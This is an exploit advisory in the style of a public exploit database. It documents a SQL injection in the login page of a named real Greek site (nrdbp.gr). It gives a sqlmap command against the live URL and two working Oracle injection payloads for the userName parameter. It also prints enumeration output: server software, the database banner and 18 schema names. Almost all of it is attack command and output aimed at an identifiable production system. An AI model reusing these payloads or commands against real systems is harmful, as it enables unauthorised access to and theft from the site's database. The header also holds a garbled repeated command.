(EAP 6) NRDBP - Login İconectiv Version 3.2.0.6 | SQL Injection Vulnerability

2022.03.18
0x01369 (TR)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: (EAP 6) NRDBP - Login İconectiv Version 3.2.0.6 | SQL Injection Vulnerability
# Author: Чингис хаан
# Tested On: Kali Linux
# sqlmap -u sqlmap -u "https://www.nrdbp.gr/NrdbpWeb/login.do" --form --current-db --dbs --banner --batch
---------------------------------------------------------------------------------------------------
NRDBP - Login (EAP 6) İconectiv Version 3.2.0.6
https://www.nrdbp.gr/NrdbpWeb/login.do

---
Parameter: userName (POST)
    Type: boolean-based blind
    Title: Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
    Payload: userName=RopA' AND (SELECT (CASE WHEN (1251=1251) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,1251) END) FROM DUAL) IS NULL-- nLLF&password=&submit=Login&face=kpDr&systemTime=20:56:19

    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
    Payload: userName=RopA' AND 8689=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(118)||CHR(112)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (8689=8689) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113))-- DUzD&password=&submit=Login&face=kpDr&systemTime=20:56:19
---

the back-end DBMS is Oracle
web server operating system: Linux Red Hat Enterprise 6 (Santiago)
web application technology: JSP 2.2, Apache 2.2.15
back-end DBMS: Oracle
banner: 'Oracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit Production'
available databases [18]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] NRDBP
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB

